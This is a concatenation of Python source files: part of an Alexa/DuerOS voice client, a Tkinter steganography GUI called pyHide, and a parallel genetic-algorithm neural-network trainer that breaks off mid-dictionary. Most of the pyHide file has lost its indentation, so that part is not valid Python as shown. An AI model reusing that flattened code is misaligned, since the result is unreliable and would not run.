    def __init__(self, config=None):
        self.event_queue = queue.Queue()
        self.SpeechRecognizer = SpeechRecognizer(self)
        self.SpeechSynthesizer = SpeechSynthesizer(self)
        self.AudioPlayer = AudioPlayer(self)
        self.Speaker = Speaker(self)
        self.Alerts = Alerts(self)
        self.System = System(self)
        self.state_listener = AlexaStateListener()

        # put() will send audio to speech recognizer
        self.put = self.SpeechRecognizer.put

        # listen() will trigger SpeechRecognizer's Recognize event
        self.listen = self.SpeechRecognizer.Recognize

        self.done = False

        self.requests = requests.Session()

        self._configfile = config
        self._config = avs.config.load(configfile=config)

        self.last_activity = datetime.datetime.utcnow()
        self._ping_time = None

    def set_state_listener(self, listner):
        """Replace the default state listener with a custom one."""
        self.state_listener = listner

    def start(self):
        """Run the client loop in a daemon thread."""
        self.done = False
        t = threading.Thread(target=self.run)
        t.daemon = True
        t.start()

    def stop(self):
        """Signal the client loop to exit."""
        self.done = True

    def send_event(self, event, listener=None, attachment=None):
        """Queue an event for delivery; listener (if callable) runs after the response."""
        self.event_queue.put((event, listener, attachment))

    def run(self):
        """Keep the connection alive, reconnecting on recoverable errors.

        ValueError (failed token refresh) is fatal and exits the process.
        """
        while not self.done:
            try:
                self._run()
            except AttributeError as e:
                logger.exception(e)
                continue
            except hyper.http20.exceptions.StreamResetError as e:
                logger.exception(e)
                continue
            except ValueError as e:
                logging.exception(e)
                # failed to get an access token, exit
                sys.exit(1)
            except Exception as e:
                logging.exception(e)
                continue

    def _run(self):
        """One connection lifetime: open downchannel, then pump events/directives."""
        conn = hyper.HTTP20Connection('{}:443'.format(
            self._config['host_url']), force_proto='h2')

        headers = {'authorization': 'Bearer {}'.format(self.token)}
        if 'dueros-device-id' in self._config:
            headers['dueros-device-id'] = self._config['dueros-device-id']

        downchannel_id = conn.request(
            'GET', '/{}/directives'.format(self._config['api']), headers=headers)
        downchannel_response = conn.get_response(downchannel_id)
        if downchannel_response.status != 200:
            raise ValueError(
                "/directive requests returned {}".format(downchannel_response.status))

        _, pdict = cgi.parse_header(
            downchannel_response.headers['content-type'][0].decode('utf-8'))
        downchannel_boundary = '--{}'.format(pdict['boundary']).encode('utf-8')
        downchannel = conn.streams[downchannel_id]
        downchannel_buffer = b''
        eventchannel_boundary = 'seeed-voice-engine'

        # ping every 5 minutes (60 seconds early for latency) to maintain the connection
        self._ping_time = datetime.datetime.utcnow() + datetime.timedelta(seconds=240)

        self.event_queue.queue.clear()
        self.System.SynchronizeState()
        while not self.done:
            try:
                event, listener, attachment = self.event_queue.get(
                    timeout=0.25)
            except queue.Empty:
                event = None

            # we want to avoid blocking if the data wasn't for stream downchannel
            while conn._sock.can_read:
                conn._single_read()

            while downchannel.data:
                framebytes = downchannel._read_one_frame()
                downchannel_buffer = self._parse_response(
                    framebytes, downchannel_boundary, downchannel_buffer
                )

            if event is None:
                # NOTE(review): UserInactivityReport fires on every idle 0.25s
                # poll tick here — confirm that is the intended cadence
                self._ping(conn)
                self.System.UserInactivityReport()
                continue

            headers = {
                ':method': 'POST',
                ':scheme': 'https',
                ':path': '/{}/events'.format(self._config['api']),
                'authorization': 'Bearer {}'.format(self.token),
                'content-type': 'multipart/form-data; boundary={}'.format(eventchannel_boundary)
            }
            if 'dueros-device-id' in self._config:
                headers['dueros-device-id'] = self._config['dueros-device-id']

            stream_id = conn.putrequest(headers[':method'], headers[':path'])
            default_headers = (':method', ':scheme', ':authority', ':path')
            for name, value in headers.items():
                is_default = name in default_headers
                conn.putheader(name, value, stream_id, replace=is_default)
            conn.endheaders(final=False, stream_id=stream_id)

            metadata = {
                'context': self.context,
                'event': event
            }
            # logger.info('metadata: {}'.format(json.dumps(metadata, indent=4)))

            json_part = '--{}\r\n'.format(eventchannel_boundary)
            json_part += 'Content-Disposition: form-data; name="metadata"\r\n'
            json_part += 'Content-Type: application/json; charset=UTF-8\r\n\r\n'
            json_part += json.dumps(metadata)

            conn.send(json_part.encode('utf-8'),
                      final=False, stream_id=stream_id)

            if attachment:
                attachment_header = '\r\n--{}\r\n'.format(
                    eventchannel_boundary)
                attachment_header += 'Content-Disposition: form-data; name="audio"\r\n'
                attachment_header += 'Content-Type: application/octet-stream\r\n\r\n'
                conn.send(attachment_header.encode('utf-8'),
                          final=False, stream_id=stream_id)

                # AVS_AUDIO_CHUNK_PREFERENCE = 320
                for chunk in attachment:
                    conn.send(chunk, final=False, stream_id=stream_id)

                    # check if StopCapture directive is received
                    while conn._sock.can_read:
                        conn._single_read()

                    while downchannel.data:
                        framebytes = downchannel._read_one_frame()
                        downchannel_buffer = self._parse_response(
                            framebytes, downchannel_boundary, downchannel_buffer
                        )

                self.last_activity = datetime.datetime.utcnow()

            end_part = '\r\n--{}--'.format(eventchannel_boundary)
            conn.send(end_part.encode('utf-8'),
                      final=True, stream_id=stream_id)

            logger.info("wait for response")
            response = conn.get_response(stream_id)
            logger.info("status code: %s", response.status)

            if response.status == 200:
                _, pdict = cgi.parse_header(
                    response.headers['content-type'][0].decode('utf-8'))
                boundary = '--{}'.format(pdict['boundary']).encode('utf-8')
                self._parse_response(response.read(), boundary)
            elif response.status == 204:
                pass
            else:
                logger.warning(response.headers)
                logger.warning(response.read())

            if listener and callable(listener):
                listener()

    def _parse_response(self, response, boundary, buffer=b''):
        """Split a multipart payload into JSON directives and audio parts.

        JSON parts containing a 'directive' are dispatched; octet-stream
        parts are written to <tempdir>/<content-id-prefix>.mp3. Returns any
        trailing bytes that did not yet form a complete part (the caller
        passes them back in as `buffer`).
        """
        directives = []
        blen = len(boundary)
        response = buffer + response
        while response:
            pos = response.find(boundary)
            if pos < 0:
                break

            # skip small data block
            if pos > blen:
                # a blank line is between parts
                parts = response[:pos - 2].split(b'\r\n\r\n', 1)
                if parts[0].find(b'application/json') >= 0:
                    metadata = json.loads(parts[1].decode('utf-8'))
                    if 'directive' in metadata:
                        directives.append(metadata['directive'])
                elif parts[0].find(b'application/octet-stream') >= 0:
                    for line in parts[0].splitlines():
                        name, value = line.split(b':', 1)
                        if name.lower() == b'content-id':
                            content_id = value.strip()[1:-1]
                            filename = base64.urlsafe_b64encode(content_id)[:8].decode('utf-8')
                            with open(os.path.join(tempfile.gettempdir(), '{}.mp3'.format(filename)), 'wb') as f:
                                f.write(parts[1])
                            logger.info('write audio to {}.mp3'.format(filename))
                            break
            response = response[pos + blen + 2:]

        for directive in directives:
            self._handle_directive(directive)

        return response

    def _handle_directive(self, directive):
        """Dispatch a directive to <namespace-interface>.<name>(directive), if implemented."""
        logger.info(json.dumps(directive, indent=4))
        try:
            namespace = directive['header']['namespace']
            name = directive['header']['name']
            if hasattr(self, namespace):
                interface = getattr(self, namespace)
                directive_func = getattr(interface, name, None)
                if directive_func:
                    directive_func(directive)
                else:
                    logger.info(
                        '{}.{} is not implemented yet'.format(namespace, name))
            else:
                logger.info('{} is not implemented yet'.format(namespace))
        except KeyError as e:
            logger.exception(e)
        except Exception as e:
            logger.exception(e)

    def _ping(self, connection):
        """Send an HTTP/2 PING when the scheduled ping time has passed."""
        if datetime.datetime.utcnow() >= self._ping_time:
            connection.ping(uuid.uuid4().hex[:8])

            logger.debug('ping at {}'.format(
                datetime.datetime.utcnow().strftime("%a %b %d %H:%M:%S %Y")))

            # ping every 5 minutes (60 seconds early for latency) to maintain the connection
            self._ping_time = datetime.datetime.utcnow() + datetime.timedelta(seconds=240)

    @property
    def context(self):
        """Current client context reported alongside every event."""
        # return [self.SpeechRecognizer.context, self.SpeechSynthesizer.context,
        #         self.AudioPlayer.context, self.Speaker.context, self.Alerts.context]
        return [self.SpeechSynthesizer.context, self.Speaker.context, self.AudioPlayer.context, self.Alerts.context]

    @property
    def token(self):
        """Return a valid access token, refreshing it via refresh_token when needed.

        Raises ValueError when no token can be obtained after 3 attempts.
        """
        date_format = "%a %b %d %H:%M:%S %Y"

        if 'access_token' in self._config:
            if 'expiry' in self._config:
                expiry = datetime.datetime.strptime(
                    self._config['expiry'], date_format)
                # refresh 60 seconds early to avoid chance of using expired access_token
                # (fixed: the original comparison only triggered a refresh 60
                # seconds AFTER expiry, contradicting this comment)
                if (expiry - datetime.datetime.utcnow()) < datetime.timedelta(seconds=60):
                    logger.info("Refreshing access_token")
                else:
                    return self._config['access_token']

        payload = {
            'client_id': self._config['client_id'],
            'client_secret': self._config['client_secret'],
            'grant_type': 'refresh_token',
            'refresh_token': self._config['refresh_token']
        }

        response = None

        # try to request an access token 3 times
        for _ in range(3):
            try:
                response = self.requests.post(
                    self._config['refresh_url'], data=payload)
                if response.status_code != 200:
                    logger.warning(response.text)
                else:
                    break
            except Exception as e:
                logger.exception(e)
                continue

        # fixed: requests.Response exposes `status_code`, not `status`, and
        # `response` may still be None here — the original error path raised
        # AttributeError instead of the intended ValueError
        status_code = getattr(response, 'status_code', None)
        if status_code != 200:
            raise ValueError(
                "refresh token request returned {}".format(status_code))

        config = response.json()

        self._config['access_token'] = config['access_token']
        expiry_time = datetime.datetime.utcnow(
        ) + datetime.timedelta(seconds=config['expires_in'])
        self._config['expiry'] = expiry_time.strftime(date_format)
        logger.debug(json.dumps(self._config, indent=4))

        avs.config.save(self._config, configfile=self._configfile)

        return self._config['access_token']

    def __enter__(self):
        self.start()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.stop()
def main():
    """Command-line entry point: authenticate if needed, then push-to-talk loop.

    Config path comes from argv[1] or the default config file; if it does not
    exist, the avs auth flow is run first to create it.
    """
    logging.basicConfig(level=logging.INFO)

    config = avs.config.DEFAULT_CONFIG_FILE if len(sys.argv) < 2 else sys.argv[1]
    if not os.path.isfile(config):
        print('Login amazon alexa or baidu dueros first')
        avs.auth.auth(None, config)

    audio = Audio()
    alexa = Alexa(config)
    audio.link(alexa)

    alexa.start()
    audio.start()

    is_quit = threading.Event()

    def signal_handler(sig, frame):
        print('Quit')
        is_quit.set()

    signal.signal(signal.SIGINT, signal_handler)

    while True:
        try:
            input('press ENTER to talk\n')
        except SyntaxError:
            pass
        except NameError:
            pass

        # NOTE(review): the quit flag is only checked after ENTER is pressed,
        # so Ctrl-C takes effect on the next keypress — confirm this is intended
        if is_quit.is_set():
            break

        alexa.listen()

    alexa.stop()
    audio.stop()


if __name__ == '__main__':
    main()
|
main.py | # ============================================================================================
# MIT License
# Copyright (c) 2020 Konstantinos Bourantas
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ============================================================================================
import lsbSteg
import tkinter as tk
import tkinter.ttk as ttk
from tkinter.filedialog import askdirectory
from tkinter import filedialog
import threading
from ttkthemes import ThemedTk
import sys
import pyfiglet
from PIL import ImageTk, Image
# ============================================================================================
class pyHide:
def __init__(self, root, image=None):
root.minsize(700, 700)
root.title('PyHide')
# icon made by : https://www.flaticon.com/authors/becris
ico = Image.open('icon.png')
photo = ImageTk.PhotoImage(ico)
root.wm_iconphoto(False, photo)
self.checkboxExport = None
self.exportOpt = 0
self.imagePath = None
self.root = root
self.frame = ttk.Frame(root)
self.frame.grid(row=0, column=1, rowspan=5, pady=30, padx=10)
# -----------------------------------------------
self.dirLabel = ttk.Label(self.frame, font=25, text="Image Path:")
self.dirLabel.grid(row=0, column=0, sticky=tk.W)
self.imagePathEntry = ttk.Entry(self.frame, font=40, width="50")
self.imagePathEntry.grid(row=0, column=1)
self.passLabel = ttk.Label(self.frame, font=25, text="Password:")
self.passLabel.grid(row=1, column=0, sticky=tk.W)
self.passwordEntry = ttk.Entry(
self.frame, show="*", font=40, width="50")
self.passwordEntry.grid(row=1, column=1)
self.btnChooseDir = ttk.Button(self.frame, text="Open", width=8,
command=lambda: self.selectImage())
self.btnChooseDir.grid(row=0, column=2)
# --------------------------------------------------------------------------------------------
# radio buttons
self.radioOption = tk.StringVar(value="")
self.radioEncode = ttk.Radiobutton(
self.frame, text="Encode", variable=self.radioOption, value='Encode', command=lambda: self.radioBtnCallback('Encode'))
self.radioEncode.grid(row=2, column=0)
self.radioDecode = ttk.Radiobutton(
self.frame, text="Decode", variable=self.radioOption, value='Decode', command=lambda: self.radioBtnCallback('Decode'))
self.radioDecode.grid(row=2, column=1, sticky=tk.W)
self.textArea = tk.Text(self.frame, height=30,
width=40, bg="black", fg="purple", insertbackground="purple")
self.textArea.config(state='normal')
self.textArea.grid(row=3, column=1, columnspan=1, rowspan=2,
sticky=tk.W+tk.E+tk.N+tk.S, pady=5)
# --------------------------------------------------------------------------------------------
# ascii banner
self.ascii_banner = pyfiglet.figlet_format('pyHide')
self.textArea.insert(
tk.END, self.ascii_banner+"\n========================================================")
# --------------------------------------------------------------------------------------------
# progress bar
self.progressBar = ttk.Progressbar(
self.frame, orient="horizontal", length=550, mode="indeterminate")
# --------------------------------------------------------------------------------------------
# cancel button
self.btnCancel = ttk.Button(self.frame, text="Exit", width=8,
command=lambda: sys.exit(1))
self.btnCancel.grid(row=6, column=2, sticky=tk.W, pady=10)
root.mainloop()
# --------------------------------------------------------------------------------------------
# Buttons callbacks functions
def imageSteg(self):
"""Encode/Decode operations on selected image"""
if self.btnOpImage['text'] == 'Encode':
# Encode message to the selected image
self.textArea.insert(tk.END, "\n[*]Encoding...")
self.subThread = threading.Thread(
target=lsbSteg.encodeImage, args=(self.imagePathEntry.get(),
self.textArea.get("1.0", tk.END).split('[*]Encoding...')[0].split('[*]Enter message:')[-1], self))
self.progressBar.grid(row=5, column=1, columnspan=1, sticky=tk.W)
self.progressBar.start()
self.subThread.start()
self.root.after(100, self.checkThread)
else:
# Decode message from the selected image
self.textArea.insert(tk.END, f"\n[*]Decoding {self.imagePath}")
self.subThread = threading.Thread(
target=lsbSteg.decodeImage, args=(self.imagePathEntry.get(), self))
self.progressBar.grid(row=5, column=1, columnspan=1, sticky=tk.W)
self.progressBar.start()
self.subThread.start()
self.root.after(100, self.checkThread)
# --------------------------------------------------------------------------------------------
def checkThread(self):
if (self.subThread.is_alive()):
self.root.after(100, self.checkThread)
return
else:
self.progressBar.stop()
self.progressBar.grid_remove()
# --------------------------------------------------------------------------------------------
    def radioBtnCallback(self, text):
        """Reset the log area and reconfigure the UI for the chosen mode.

        *text* is either "Encode" or "Decode" and also becomes the label of
        the operation button.
        """
        self.textArea.delete('1.0', tk.END)
        self.textArea.insert(
            tk.END, self.ascii_banner+"\n========================================================")
        if text == "Encode":
            self.textArea.insert(tk.END, "\n[*]Enter message:")
            # NOTE(review): this assumes self.checkboxExport already exists
            # (presumably initialised in __init__ or by a prior "Decode"
            # callback); if it was never set, this attribute access raises
            # AttributeError -- TODO confirm against the constructor.
            if self.checkboxExport:
                self.checkboxExport.grid_remove()
        else:
            # Decode mode offers an optional "export to file" checkbox.
            self.exportOpt = tk.IntVar()
            self.checkboxExport = ttk.Checkbutton(
                self.frame, text="Export to file", variable=self.exportOpt)
            self.checkboxExport.grid(row=2, column=2, sticky=tk.E)
        # The action button stays disabled until an image has been selected.
        self.btnOpImage = ttk.Button(self.frame, text=text, width=8,
                                     command=lambda: self.imageSteg(), state="normal" if self.imagePath else "disabled")
        self.btnOpImage.grid(row=1, column=2)
# --------------------------------------------------------------------------------------------
def selectImage(self):
"""Open an image from a directory"""
# Select the Imagename from a folder
tk.Tk().withdraw()
self.imagePath = filedialog.askopenfilename(title='Open Image')
self.imagePathEntry.delete(0, tk.END)
self.imagePathEntry.insert(tk.INSERT, self.imagePath)
# opens the image
img = Image.open(self.imagePath)
# resize the image and apply a high-quality down sampling filter
img = img.resize((200, 200), Image.ANTIALIAS)
# PhotoImage class is used to add image to widgets, icons etc
img = ImageTk.PhotoImage(img)
# create a label
self.panel = ttk.Label(self.frame, image=img)
# set the image as img
self.panel.image = img
self.panel.grid(row=3, column=0, padx=5)
try:
self.btnOpImage['state'] = 'normal'
except:
pass
# ============================================================================================
if __name__ == "__main__":
    # Build the themed Tk root window and hand it to the application class,
    # which constructs the UI and enters the main loop itself.
    root = ThemedTk(background=True, theme="equilux")
    pyHide(root)
# ============================================================================================
|
GAParallel.py | # this is the parallelized version of GA.py. Parallelized by Matteo Bjornsson, original code written by Nick Stone
################################################################################
import random
import Performance
from NeuralNetwork import NeuralNetwork
import DataUtility
import numpy as np
import copy
import multiprocessing
import traceback
class individual:
    """One member of the GA population: a flat weight vector plus its fitness.

    Lower fitness is better; new individuals start at +infinity (worst).
    """

    def __init__(self):
        self.fitness = float('inf')
        # Flat numpy array holding every network weight.
        self.chromosome = []
        self.Size = 0

    def InitChromie(self, Feature_Size):
        """Initialise the chromosome to ``Feature_Size`` zeros.

        Bug fix: the original built the one-element list ``[Feature_Size]``
        and zeroed it, yielding a length-1 chromosome instead of a zero
        vector of the requested length.
        """
        self.chromosome = np.zeros(Feature_Size)
        self.Size = Feature_Size

    def setfit(self, fit):
        """Store the fitness score computed for this chromosome."""
        self.fitness = fit

    def getfit(self):
        """Return the stored fitness score."""
        return self.fitness

    def SetChromie(self, Chromos):
        """Replace the chromosome with *Chromos* (a numpy weight vector)."""
        self.chromosome = Chromos

    def SetSize(self, si):
        """Record the chromosome length."""
        self.Size = si

    def getsize(self):
        """Return the chromosome length."""
        return self.Size

    def getChromie(self):
        """Return the chromosome array."""
        return self.chromosome

    def ReturnChromie(self):
        """Alias of :meth:`getChromie`, kept for callers that use this name."""
        return self.chromosome

    def printChromie(self):
        """Print each gene on its own line (debug helper)."""
        for i in self.chromosome:
            print(i)
class GA:
    """Genetic algorithm that evolves flat weight vectors for a neural network.

    The population is a list of ``individual`` objects; fitness is computed
    by the wrapped network (lower is better), survivors are picked by ranked
    roulette selection, and children are produced by uniform crossover
    followed by point mutation.
    """

    #####################
    # Initialize the population etc
    ####################
    def __init__(self, hyperparameters: dict, Total_Weight: int, NN):
        """Build a random initial population.

        :param hyperparameters: dict with keys ``maxGen``, ``pop_size``,
            ``mutation_rate``, ``mutation_range`` and ``crossover_rate``.
        :param Total_Weight: chromosome length (total number of NN weights).
        :param NN: network object exposing ``fitness(weights) -> float``.
        """
        self.maxGen = hyperparameters["maxGen"]
        self.pop_size = hyperparameters["pop_size"]
        self.mutation_rate = hyperparameters["mutation_rate"]
        self.mutation_range = hyperparameters["mutation_range"]
        self.crossover_rate = hyperparameters["crossover_rate"]
        self.generation = 0
        # Chromosome length equals the number of network weights.
        self.Chromosome_Size = Total_Weight
        self.nn = NN
        # Best fitness observed at each generation, for later inspection.
        self.globalfit = list()
        # Seed every member of the population with uniform random weights.
        self.population = list()
        for _ in range(self.pop_size):
            temp = individual()
            temp.SetSize(Total_Weight)
            temp.InitChromie(Total_Weight)
            temp.SetChromie(self.GenerateWeights())
            self.population.append(temp)
        # Track the best individual ever observed across generations.
        self.bestChromie = self.population[0]

    def GenerateWeights(self):
        """Return a fresh random weight vector drawn uniformly from [-1, 1)."""
        low, high = -1, 1
        return np.random.uniform(low, high, self.Chromosome_Size)

    ########################################
    # Evaluate the fitness of the population
    ########################################
    def fitness(self) -> None:
        """Evaluate and store each individual's fitness via the network.

        Annotation fixed: this method stores scores and returns None.
        """
        for member in self.population:
            member.setfit(self.nn.fitness(member.getChromie()))

    def pfitness(self) -> None:
        """Verbose variant of :meth:`fitness` that prints every score."""
        print("FITNESS")
        for member in self.population:
            fitscore = self.nn.fitness(member.getChromie())
            print(fitscore)
            member.setfit(fitscore)

    ##################################
    # pick a subset of POP based ranked selection
    #####################################
    def selection(self) -> None:
        """Keep roughly half the population via ranked roulette selection.

        Also records this generation's best fitness and updates the global
        best individual.
        """
        self.population = sorted(self.population,
                                 key=lambda member: member.fitness)
        bestChromie = self.population[0]
        self.globalfit.append(bestChromie.fitness)
        if bestChromie.fitness < self.bestChromie.fitness:
            self.bestChromie = bestChromie
        pop = self.pop_size
        # RANKED ROULETTE SELECTION: rank i survives with probability
        # 2*(pop-i-1) / (pop*(pop-1)); draw pop/2 + 1 survivors.
        newPopulation = list()
        Subset = int(pop / 2) + 1
        for _ in range(Subset):
            choice = random.random()
            cumulative = 0  # renamed from "sum" to avoid shadowing the builtin
            for i in range(pop):
                cumulative += 2 / pop * (pop - (i + 1)) / (pop - 1)
                if cumulative > choice:
                    newPopulation.append(self.population[i])
                    break
        self.population = newPopulation

    ####################################
    # make new generation based on parent selection by swapping chromosomes
    ####################################
    def crossover(self) -> None:
        """Produce the next generation by uniform crossover, then mutate it.

        Adjacent parents produce two complementary children; the new
        population is trimmed back down to ``pop_size`` by random removal.
        """
        self.generation = self.generation + 1
        NewPop = list()
        for p in range(len(self.population) - 1):
            Parent1 = self.population[p]
            Parent2 = self.population[p + 1]
            Child1 = individual()
            Child2 = individual()
            Child1.InitChromie(Parent1.getsize())
            Child2.InitChromie(Parent2.getsize())
            NewChromoC1 = list()
            NewChromoC2 = list()
            # Uniform crossover: each gene is swapped with probability
            # crossover_rate; the two children receive complementary genes.
            for g in range(Parent1.getsize()):
                if random.random() > self.crossover_rate:
                    bit = Parent1.getChromie()[g]
                    bit2 = Parent2.getChromie()[g]
                else:
                    bit = Parent2.getChromie()[g]
                    bit2 = Parent1.getChromie()[g]
                NewChromoC1.append(bit)
                NewChromoC2.append(bit2)
            Child1.SetChromie(np.array(NewChromoC1))
            Child2.SetChromie(np.array(NewChromoC2))
            NewPop.append(Child1)
            NewPop.append(Child2)
        self.population = NewPop
        # Trim back to pop_size.  Bug fix: the original drew
        # random.randint(0, len(population)), whose upper bound is inclusive
        # and could index one past the end of the list (IndexError).
        while len(self.population) > self.pop_size:
            self.population.pop(random.randrange(len(self.population)))
        self.mutate()

    ###################################
    # introduce random change to each individual in the generation
    ###############################
    def mutate(self) -> None:
        """With probability ``mutation_rate``, replace one random gene of each
        individual with a uniform draw from [-mutation_range, mutation_range]."""
        for member in self.population:
            if random.random() > self.mutation_rate:
                continue
            genes = member.getChromie()
            spot = random.randint(0, len(genes) - 1)
            genes[spot] = random.uniform(-self.mutation_range,
                                         self.mutation_range)
            member.SetChromie(genes)
def driver(q, ds: str, data_package: list, regression: bool, perf: Performance, hidden_layers: list, hyper_params: dict, count: int, total_counter: int, total: int):
    """Worker process: train one network with the GA on one data fold.

    :param q: multiprocessing queue the CSV result line is pushed onto.
    :param ds: data set name (used for labelling and progress printing).
    :param data_package: [test_data, test_labels, training_data,
        training_labels, output_size, input_size] as produced by
        ``generate_data_package``.
    :param regression: True for regression data sets, False for classification.
    :param perf: Performance helper used to score the trained network.
    :param hidden_layers: list of hidden-layer node counts.
    :param hyper_params: GA hyperparameters (maxGen, pop_size, ...).
    :param count: per-data-set job index (progress bookkeeping).
    :param total_counter: global job index (progress bookkeeping).
    :param total: total number of jobs (progress bookkeeping).
    """
    print("Job ", ds, count, "started")
    try:
        # init all test data values
        test_data, test_labels, training_data, training_labels, output_size, input_size = data_package
        layers = [input_size] + hidden_layers + [output_size]
        # init neural network and attach the training fold
        nn = NeuralNetwork(input_size, hidden_layers, regression, output_size)
        nn.set_input_data(training_data, training_labels)
        # Total weight count: one weight per edge between consecutive layers.
        total_weights = 0
        for i in range(len(layers)-1):
            total_weights += layers[i] * layers[i+1]
        # GA signature: (hyperparameters: dict, Total_Weight: int, NN)
        ga = GA(hyper_params, total_weights, nn)
        # Evolve: evaluate, select survivors, breed/mutate, for maxGen rounds.
        for gen in range(ga.maxGen):
            ga.fitness()
            ga.selection()
            ga.crossover()
        # get best overall solution and set the NN weights
        bestSolution = ga.bestChromie.getChromie()
        bestWeights = ga.nn.weight_transform(bestSolution)
        ga.nn.weights = bestWeights
        # pass the test data through the trained NN
        results = classify(test_data, test_labels, regression, ga, perf)
        # Metadata columns preceding the two loss values in the CSV row.
        Meta = [
            ds,
            len(hidden_layers),
            hyper_params["maxGen"],
            hyper_params["pop_size"],
            hyper_params["mutation_rate"],
            hyper_params["mutation_range"],
            hyper_params["crossover_rate"]
        ]
        results_performance = perf.LossFunctionPerformance(regression, results)
        data_point = Meta + results_performance
        data_point_string = ','.join([str(x) for x in data_point])
        # put the result on the multiprocessing queue
        q.put(data_point_string)
        print(f"{ds} {count}/{int(total/6)}. {total_counter}/{total}")
    except Exception as e:
        print('Caught exception in worker thread')
        # This prints the type, value, and stack trace of the
        # current exception being handled.
        traceback.print_exc()
        print()
        # Re-raise so the pool records the failure.
        raise e
def generate_data_package(fold: int, tenfolds: list, regression: bool, du: DataUtility):
    """Assemble train/test arrays for one cross-validation fold.

    Returns [test_data, test_labels, training_data, training_labels,
    output_size, input_size]: fold *fold* becomes the test set, the other
    nine folds are concatenated column-wise as training data, and both label
    sets are converted to one-hot encoding.
    """
    test_data, test_labels = copy.deepcopy(tenfolds[fold])
    # Deep-copy the remaining folds so callers' arrays are never mutated.
    remaining = [pair for i, pair in enumerate(copy.deepcopy(tenfolds))
                 if i != fold]
    training_data = np.concatenate([pair[0] for pair in remaining], axis=1)
    training_labels = np.concatenate([pair[1] for pair in remaining], axis=1)
    # Regression nets get a single output node; classifiers get one node per
    # class found in the training labels.
    output_size = 1 if regression else du.CountClasses(training_labels)
    # One-hot encode both label sets.
    test_labels = du.ConvertLabels(test_labels, output_size)
    training_labels = du.ConvertLabels(training_labels, output_size)
    input_size = training_data.shape[0]
    return [test_data, test_labels, training_data, training_labels, output_size, input_size]
def classify(test_data: np.ndarray, test_labels: np.ndarray, regression: bool, ga: GA, perf: Performance):
    """Run the trained network over the test fold and pair estimates with truth.

    Classification outputs are decoded from one-hot via PickLargest;
    regression outputs are compared against the raw label row.
    """
    estimates = ga.nn.classify(test_data, test_labels)
    if regression:
        ground_truth = test_labels.tolist()[0]
        estimates = estimates.tolist()[0]
    else:
        # Decode the one-hot encodings back to class indices.
        estimates = ga.nn.PickLargest(estimates)
        ground_truth = ga.nn.PickLargest(test_labels)
    return perf.ConvertResultsDataStructure(ground_truth, estimates)
# this function takes the results from the queue that all async jobs write to, and
# writes the jobs to disk. This function is meant to be started as it's own process.
# param q is the multiprocess Manager queue object shared by all jobs.
def data_writer(q, filename):
    """Drain result strings from *q* into *filename* until 'kill' arrives.

    Each message becomes one line; the 'kill' sentinel writes a final blank
    line and stops the loop.  Fix: the file is opened once (append mode) for
    the whole run instead of being re-opened for every single message.
    Note that writes may now be buffered until the process finishes.
    """
    with open(filename, 'a') as f:
        while True:
            data_string = q.get()
            if data_string == 'kill':
                f.write('\n')
                break
            f.write(data_string + '\n')
if __name__ == '__main__':
    # Column headers for the CSV results file: hyperparameter metadata
    # followed by the two loss values each worker appends.
    headers = ["Data set", "layers", "maxGen", "pop_size", "mutation_rate", "mutation_range", "crossover_rate", "loss1", "loss2"]
    filename = 'GA_results.csv'
    Per = Performance.Results()
    Per.PipeToFile([], headers, filename)
    data_sets = ["soybean", "glass","Cancer","forestfires", "machine", "abalone"]
    # True marks regression tasks, False classification tasks.
    regression_data_set = {
        "soybean": False,
        "Cancer": False,
        "glass": False,
        "forestfires": True,
        "machine": True,
        "abalone": True
    }
    # Indices of categorical attributes per data set (none used here).
    categorical_attribute_indices = {
        "soybean": [],
        "Cancer": [],
        "glass": [],
        "forestfires": [],
        "machine": [],
        "abalone": []
    }
    # Tuned GA hyperparameters for networks with zero hidden layers.
    tuned_0_hl = {
        "soybean": {
            "mutation_rate": .2,
            "crossover_rate": .2,
            "hidden_layer": []
        },
        "Cancer": {
            "mutation_rate": .8,
            "crossover_rate": .5,
            "hidden_layer": []
        },
        "glass": {
            "mutation_rate": .5,
            "crossover_rate": .2,
            "hidden_layer": []
        },
        "forestfires": {
            "mutation_rate": .2,
            "crossover_rate": .5,
            "hidden_layer": []
        },
        "machine": {
            "mutation_rate": .2,
            "crossover_rate": .2,
            "hidden_layer": []
        },
        "abalone": {
            "mutation_rate": .5,
            "crossover_rate": .5,
            "hidden_layer": []
        }
    }
    # Tuned GA hyperparameters for networks with one hidden layer.
    tuned_1_hl = {
        "soybean": {
            "mutation_rate": .2,
            "crossover_rate": .2,
            "hidden_layer": [7]
        },
        "Cancer": {
            "mutation_rate": .5,
            "crossover_rate": .2,
            "hidden_layer": [4]
        },
        "glass": {
            "mutation_rate": .2,
            "crossover_rate": .2,
            "hidden_layer": [8]
        },
        "forestfires": {
            "mutation_rate": .5,
            "crossover_rate": .2,
            "hidden_layer": [8]
        },
        "machine": {
            "mutation_rate": .5,
            "crossover_rate": .2,
            "hidden_layer": [4]
        },
        "abalone": {
            "mutation_rate": .8,
            "crossover_rate": .2,
            "hidden_layer": [8]
        }
    }
    # Tuned GA hyperparameters for networks with two hidden layers.
    tuned_2_hl = {
        "soybean": {
            "mutation_rate": .2,
            "crossover_rate": .2,
            "hidden_layer": [7,12]
        },
        "Cancer": {
            "mutation_rate": .5,
            "crossover_rate": .2,
            "hidden_layer": [4,4]
        },
        "glass": {
            "mutation_rate": .5,
            "crossover_rate": .5,
            "hidden_layer": [8,6]
        },
        "forestfires": {
            "mutation_rate": .2,
            "crossover_rate": .5,
            "hidden_layer": [8,8]
        },
        "machine": {
            "mutation_rate": .5,
            "crossover_rate": .5,
            "hidden_layer": [7,2]
        },
        "abalone": {
